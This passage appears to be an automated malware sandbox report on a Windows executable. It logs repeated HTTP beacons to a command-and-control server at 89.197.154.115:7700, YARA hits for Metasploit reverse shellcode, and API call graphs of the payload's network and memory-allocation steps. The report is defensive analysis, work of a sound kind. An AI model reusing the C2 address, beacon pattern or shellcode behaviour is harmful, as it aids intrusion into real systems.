                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.84971489.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:33.854751110 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.84971589.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:40.448544979 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.84971689.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:47.095710039 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.86365389.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:53.764013052 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.86365489.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:49:12.292284966 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.86365589.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:49:18.918940067 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Click to jump to process

                              Click to jump to process

                              Target ID:0
                              Start time:10:48:05
                              Start date:27/09/2024
                              Path:C:\Users\user\Desktop\DRVf7H9j4V.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\DRVf7H9j4V.exe"
                              Imagebase:0x400000
                              File size:73'802 bytes
                              MD5 hash:EF9E66020F10A61F05BC865B167248D5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:4.4%
                                Dynamic/Decrypted Code Coverage:28.3%
                                Signature Coverage:17.4%
                                Total number of Nodes:92
                                Total number of Limit Nodes:3
                                execution_graph 1484 690000 1487 690095 LoadLibraryA 1484->1487 1486 690006 1496 690105 InternetOpenA 1487->1496 1489 6900b4 1490 6901ab InternetConnectA 1489->1490 1492 690134 1489->1492 1493 690172 1489->1493 1490->1492 1491 6901c2 HttpOpenRequestA 1491->1493 1492->1491 1492->1493 1494 6901e2 Sleep 1493->1494 1495 6901a2 1493->1495 1494->1493 1494->1495 1495->1486 1505 690225 1496->1505 1498 69011c 1499 6901ab InternetConnectA 1498->1499 1500 690134 1498->1500 1504 690172 1498->1504 1499->1500 1502 6901c2 HttpOpenRequestA 1500->1502 1500->1504 1501 6901e2 Sleep 1503 6901a2 1501->1503 1501->1504 1502->1504 1503->1489 1504->1501 1504->1503 1508 6901aa 1505->1508 1507 69022b ExitProcess 1509 6901ab InternetConnectA 1508->1509 1510 6901b2 HttpOpenRequestA 1509->1510 1512 6901cb 1510->1512 1513 6901e2 Sleep 1512->1513 1514 6901ea 1512->1514 1513->1512 1513->1514 1514->1507 1551 403d4d 1554 4086e0 1551->1554 1553 403d57 fprintf 1555 4086ed 1554->1555 1555->1553 1541 405cee 1542 405cfb 1541->1542 1546 405d2b 1541->1546 1547 405f20 1542->1547 1544 405db3 GetEnvironmentStringsW 1545 405e38 SetLastError 1544->1545 1545->1544 1546->1544 1550 405f49 1547->1550 1548 405f78 1548->1546 1549 405f8f wcsncmp 1549->1548 1549->1550 1550->1548 1550->1549 1535 40a430 1536 40a45f DeleteCriticalSection 1535->1536 1537 40a3f6 1535->1537 1538 40a485 1536->1538 1537->1535 1537->1536 1568 401390 1571 40139e 1568->1571 1569 401418 VirtualAlloc 1569->1571 1570 401592 2 API calls 1570->1571 1571->1569 1571->1570 1572 401461 1571->1572 1573 405f95 wcsncmp 1574 405f56 1573->1574 1575 405f78 1573->1575 1574->1575 1576 405f8f wcsncmp 1574->1576 1576->1574 1576->1575 1520 406a18 1523 40b52c 1520->1523 1526 40b500 1523->1526 1525 406a29 1527 40b515 __dllonexit 1526->1527 1528 40b509 1526->1528 1527->1525 1528->1525 1539 405e38 SetLastError 1540 405db3 GetEnvironmentStringsW 1539->1540 1540->1539 1556 405dd8 __p__environ 1557 405e05 1556->1557 1450 401459 1452 4013ea 1450->1452 1451 401418 VirtualAlloc 1451->1452 1452->1451 1454 401461 1452->1454 1455 401592 1452->1455 1456 401597 1455->1456 1459 40162c 1456->1459 1458 40159d 1458->1458 1460 40163f 1459->1460 1465 40169c 1460->1465 1462 40164b 1464 401739 1462->1464 1471 4017d1 1462->1471 1464->1458 1466 4016a3 1465->1466 1475 4017bc 1466->1475 1468 4016b3 1469 4017d1 calloc 1468->1469 1470 401739 1468->1470 1469->1468 1470->1462 1473 4017db calloc 1471->1473 1474 40186d 1473->1474 1474->1462 1480 401741 1475->1480 1479 40186d 1479->1468 1481 401742 1480->1481 1482 4017d1 calloc 1481->1482 1483 4017ba calloc 1481->1483 1482->1481 1483->1479 1529 40581a 1530 405821 1529->1530 1532 40583d 1530->1532 1533 40a4b0 WaitForSingleObject 1530->1533 1534 40a4ef 1533->1534 1534->1530

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 62 690095-6900b6 LoadLibraryA call 690105 65 6900b8-6900f9 62->65 66 690121 62->66 67 6900fb-6900fd 65->67 68 690160 65->68 69 690173-690184 66->69 70 690123-690124 66->70 72 6900ff-690103 67->72 73 69012e-690132 67->73 76 6901d3-6901d6 68->76 77 690162-690170 68->77 71 690187-69019c 69->71 74 690185 70->74 75 690126-69012c 70->75 78 6901ec-6901ee 71->78 79 6901a0 71->79 72->66 80 6901ab-6901b0 InternetConnectA 73->80 81 690134-690136 73->81 74->71 74->76 75->73 85 6901d7-6901d9 76->85 82 6901bd-6901c0 77->82 83 690172 77->83 90 6901ef-690206 78->90 84 6901a2-6901ad 79->84 79->85 87 6901b2-6901b5 80->87 81->71 88 690138 81->88 86 6901c2-6901ca HttpOpenRequestA 82->86 83->69 85->90 94 6901db-6901e8 Sleep 85->94 92 6901cb-6901d0 86->92 91 6901ba-6901bc 87->91 88->87 93 69013a-690146 88->93 98 690208-690219 90->98 91->82 92->76 93->86 96 690148-69014d 93->96 94->92 100 6901ea call 69023a 94->100 96->91 101 69014f-69015f 96->101 98->100 104 69021b-690221 98->104 100->78 101->68 104->98 105 690223-690224 104->105
                                APIs
                                • LoadLibraryA.KERNELBASE(0726774C,?,696E6977,0074656E), ref: 006900A6
                                  • Part of subcall function 00690105: InternetOpenA.WININET(A779563A,006900B4,00000000,00000000,00000000,00000000,00000000,?,696E6977,0074656E), ref: 0069010A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: InternetLibraryLoadOpen
                                • String ID:
                                • API String ID: 2559873147-0
                                • Opcode ID: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
                                • Instruction ID: 6c76d9627918b0570c42022a7dbf2d98376413efa427beb2ab28ad4067ed4ac0
                                • Opcode Fuzzy Hash: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
                                • Instruction Fuzzy Hash: 1A31877100D7D46EEB22DBB48A998A3FF6FFE4375032511DED4C00D863D242A912C3A6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 690105-690121 InternetOpenA call 690225 4 690173-690184 0->4 5 690123-690124 0->5 6 690187-69019c 4->6 7 690185 5->7 8 690126-690132 5->8 9 6901ec-6901ee 6->9 10 6901a0 6->10 7->6 12 6901d3-6901d6 7->12 15 6901ab-6901b0 InternetConnectA 8->15 16 690134-690136 8->16 17 6901ef-690206 9->17 13 6901a2-6901ad 10->13 14 6901d7-6901d9 10->14 12->14 14->17 21 6901db-6901e8 Sleep 14->21 18 6901b2-6901b5 15->18 16->6 19 690138 16->19 26 690208-690219 17->26 23 6901ba-6901bc 18->23 19->18 24 69013a-690146 19->24 30 6901cb-6901d0 21->30 31 6901ea call 69023a 21->31 27 6901bd-6901c0 23->27 28 690148-69014d 24->28 29 6901c2-6901ca HttpOpenRequestA 24->29 26->31 36 69021b-690221 26->36 27->29 28->23 35 69014f-690160 28->35 29->30 30->12 31->9 35->12 39 690162-690170 35->39 36->26 38 690223-690224 36->38 39->27 40 690172 39->40 40->4
                                APIs
                                • InternetOpenA.WININET(A779563A,006900B4,00000000,00000000,00000000,00000000,00000000,?,696E6977,0074656E), ref: 0069010A
                                  • Part of subcall function 00690225: ExitProcess.KERNEL32(56A2B5F0,00000000,006901EF,?,00000000,00000000,?,696E6977,0074656E), ref: 00690242
                                • InternetConnectA.WININET(C69F8957,00000000,0069022B,00001E14,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 006901B0
                                • HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,0069011C,00000000,00000000,00000000,84680200,00000000,?,696E6977,0074656E), ref: 006901C5
                                • Sleep.KERNELBASE(E035F044,00001388,?,696E6977,0074656E), ref: 006901E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: InternetOpen$ConnectExitHttpProcessRequestSleep
                                • String ID:
                                • API String ID: 3361638204-0
                                • Opcode ID: 7d39bbe59174fb60e31f98151c3302ef927af0be60f635ba57572ff16e215d11
                                • Instruction ID: b9e22a7414f1141549994fb4ff1f23e14203b565a6da965abc6128076fe0c0a3
                                • Opcode Fuzzy Hash: 7d39bbe59174fb60e31f98151c3302ef927af0be60f635ba57572ff16e215d11
                                • Instruction Fuzzy Hash: B2417C711083893FFF2196A55CC9F7BBF6FEB427D8B21015AF5405A882E651ED01C2B5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 41 6901aa-6901ca InternetConnectA HttpOpenRequestA 47 6901cb-6901d9 41->47 51 6901db-6901e8 Sleep 47->51 52 6901ef-690206 47->52 51->47 55 6901ea-6901ee call 69023a 51->55 56 690208-690219 52->56 55->52 56->55 60 69021b-690221 56->60 60->56 61 690223-690224 60->61
                                APIs
                                • InternetConnectA.WININET(C69F8957,00000000,0069022B,00001E14,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 006901B0
                                • HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,0069011C,00000000,00000000,00000000,84680200,00000000,?,696E6977,0074656E), ref: 006901C5
                                • Sleep.KERNELBASE(E035F044,00001388,?,696E6977,0074656E), ref: 006901E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConnectHttpInternetOpenRequestSleep
                                • String ID:
                                • API String ID: 3895984052-0
                                • Opcode ID: 129c4a7d84763168dc248614861d05e1353dc605aa10c92fbfce95b48463f942
                                • Instruction ID: 9d58e7679729064db614607666cbfbb544285032bfac92e8935496938f0515be
                                • Opcode Fuzzy Hash: 129c4a7d84763168dc248614861d05e1353dc605aa10c92fbfce95b48463f942
                                • Instruction Fuzzy Hash: 5FF05EF038131E3DF93112A75CDAF7B2A4DCB95BECF110020B608EA580EA90DD40C07A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 106 690225-690242 call 6901aa ExitProcess
                                APIs
                                  • Part of subcall function 006901AA: InternetConnectA.WININET(C69F8957,00000000,0069022B,00001E14,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 006901B0
                                  • Part of subcall function 006901AA: HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,0069011C,00000000,00000000,00000000,84680200,00000000,?,696E6977,0074656E), ref: 006901C5
                                  • Part of subcall function 006901AA: Sleep.KERNELBASE(E035F044,00001388,?,696E6977,0074656E), ref: 006901E5
                                • ExitProcess.KERNEL32(56A2B5F0,00000000,006901EF,?,00000000,00000000,?,696E6977,0074656E), ref: 00690242
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConnectExitHttpInternetOpenProcessRequestSleep
                                • String ID:
                                • API String ID: 1983138902-0
                                • Opcode ID: 6c3978b96584fe2db115ff66e57c80923a8db916f0f2145dffa80c26459278a4
                                • Instruction ID: c2d498806128e7529f1aaafc9fe90142e389d452b7a992d228b626b465c856c2
                                • Opcode Fuzzy Hash: 6c3978b96584fe2db115ff66e57c80923a8db916f0f2145dffa80c26459278a4
                                • Instruction Fuzzy Hash: 9DC08C3040B28C8A9B06BB74410221E3F2199033043A820AEC08198432C2088006CB2A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 109 40140f-401414 110 401416-401417 109->110 111 40145a-40145f 109->111 114 401418-401447 VirtualAlloc call 401592 110->114 112 401461-4014eb call 401563 111->112 113 4013ea-401404 111->113 131 4014f1-401515 112->131 132 401533-40154f 112->132 113->114 114->111 131->132 136 40151b-401521 131->136 139 401550 132->139 136->132 139->139
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ef405c489670d556df1225da78f3e26dd8f873b2e4b4bfd2d639d6386b93873
                                • Instruction ID: b43aeb6041541093d402538bb96e736a53177450ba43d8348cecd530aab8e9e2
                                • Opcode Fuzzy Hash: 9ef405c489670d556df1225da78f3e26dd8f873b2e4b4bfd2d639d6386b93873
                                • Instruction Fuzzy Hash: D80141242AF240E6CA5464700C90AF42259A78B388B603833E80BBF6F3D97C8443A35F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 140 401390-4013df 145 4013ef-40145f VirtualAlloc call 401592 140->145 153 401461-4014eb call 401563 145->153 154 4013ea-4013ee 145->154 165 4014f1-401515 153->165 166 401533-40154f 153->166 154->145 165->166 170 40151b-401521 165->170 173 401550 166->173 170->166 173->173
                                APIs
                                • VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 2f7ad1892db9d076f9614ca5f2bee8c7bdd05cf97c0b4b08d2d38629c3036920
                                • Instruction ID: 36515bd9a21eca4ffc3442796705fa328addfbc3c26c90cc4d31d2f2eaf89b35
                                • Opcode Fuzzy Hash: 2f7ad1892db9d076f9614ca5f2bee8c7bdd05cf97c0b4b08d2d38629c3036920
                                • Instruction Fuzzy Hash: 36E0173138D250E2F51050112882BB8218D074D741E302433AA0B7AEF7A8BC0443325F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 174 40139a-4013df 178 4013ef-40145f VirtualAlloc call 401592 174->178 186 401461-4014eb call 401563 178->186 187 4013ea-4013ee 178->187 198 4014f1-401515 186->198 199 401533-40154f 186->199 187->178 198->199 203 40151b-401521 198->203 206 401550 199->206 203->199 206->206
                                APIs
                                • VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 76511478a1293fcbe4e4fc8c354e56449f04188a766149da1ff90902e34aa6e7
                                • Instruction ID: 4caf21fafcdbd35a8187c40c7f4a7ebb3d6fde15630f7e773a5ec81ff96f2d60
                                • Opcode Fuzzy Hash: 76511478a1293fcbe4e4fc8c354e56449f04188a766149da1ff90902e34aa6e7
                                • Instruction Fuzzy Hash: B0E0173078D255EAE61050115892BB82089078D741F346437AA0F7AAF6E9BC054372AF

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 207 4013e4-4013e7 208 4013ea-40145f VirtualAlloc call 401592 207->208 217 401461-4014eb call 401563 208->217 228 4014f1-401515 217->228 229 401533-40154f 217->229 228->229 233 40151b-401521 228->233 236 401550 229->236 233->229 236->236
                                APIs
                                • VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 2a5d81dc87a261b2252c3e7fd3a5bbe2569150189334329988719ab59b711cb5
                                • Instruction ID: 4e47fe8511e51b7c845068726a1751513bcc1e9ac111c00a738d05cde4b35e22
                                • Opcode Fuzzy Hash: 2a5d81dc87a261b2252c3e7fd3a5bbe2569150189334329988719ab59b711cb5
                                • Instruction Fuzzy Hash: B3D0A925608210ABC700627818463F871850B8C300F204037E01BBA2F2EAB8494B32BF

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 237 4013fe 238 4013ff-40145f VirtualAlloc call 401592 237->238 245 401461-4014eb call 401563 238->245 246 4013ea-4013f2 238->246 258 4014f1-401515 245->258 259 401533-40154f 245->259 246->238 258->259 263 40151b-401521 258->263 266 401550 259->266 263->259 266->266
                                APIs
                                • VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 597d6537576dd44ed3367bbe92ea61a3c23de9647e80ad20aeafef875af113e1
                                • Instruction ID: ed4fc12d8f14c241b0cd07e89e342629f8af31190ef920adaa250682d43661c3
                                • Opcode Fuzzy Hash: 597d6537576dd44ed3367bbe92ea61a3c23de9647e80ad20aeafef875af113e1
                                • Instruction Fuzzy Hash: 6EC09224308519AAC6406174188617C10820ACC3843B84037D017BA2F7EE7C898772AF

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 379 40a430-40a43a 380 40a43c-40a441 379->380 381 40a45f-40a483 DeleteCriticalSection 379->381 382 40a443-40a44f 380->382 383 40a458-40a45e 380->383 384 40a485-40a494 381->384 385 40a4ca-40a4ed 381->385 386 40a452-40a456 382->386 387 40a3f6-40a421 382->387 383->381 388 40a4a2-40a4ab 384->388 389 40a496-40a4a1 384->389 390 40a4f1-40a4f6 385->390 391 40a4ef 385->391 386->383 387->379 388->385 389->388 392 40a503-40a51b 390->392 393 40a4f8-40a4fe 390->393 391->390 393->392
                                APIs
                                • DeleteCriticalSection.KERNEL32(00410728), ref: 0040A475
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalDeleteSection
                                • String ID: ^
                                • API String ID: 166494926-1590793086
                                • Opcode ID: 0f2d0937ee027a78d66c8a320dee57459cf8de25c20a429baf7a913160c9b7e3
                                • Instruction ID: 80ce654e35391de0925871baf317a5aa4475a278df2f13d72fc40d479a512080
                                • Opcode Fuzzy Hash: 0f2d0937ee027a78d66c8a320dee57459cf8de25c20a429baf7a913160c9b7e3
                                • Instruction Fuzzy Hash: 8131353014A3954FD712CB789CA8AD67FE0AF47330F1846ABD8A4DB1E3D2798486C746
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 64ffe756a1041e19f60a1079324893caef8a313680ad2cc6323e13a05ebc89cc
                                • Instruction ID: 90cf158eb33d83088b1a19a937ed0ebdbb073ad35d0ba4845464958a89f681b7
                                • Opcode Fuzzy Hash: 64ffe756a1041e19f60a1079324893caef8a313680ad2cc6323e13a05ebc89cc
                                • Instruction Fuzzy Hash: E3517C32904A549FCB12DE28C8901AB7B71EF42324F0842BFD845EB2C2D7389917CF89
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
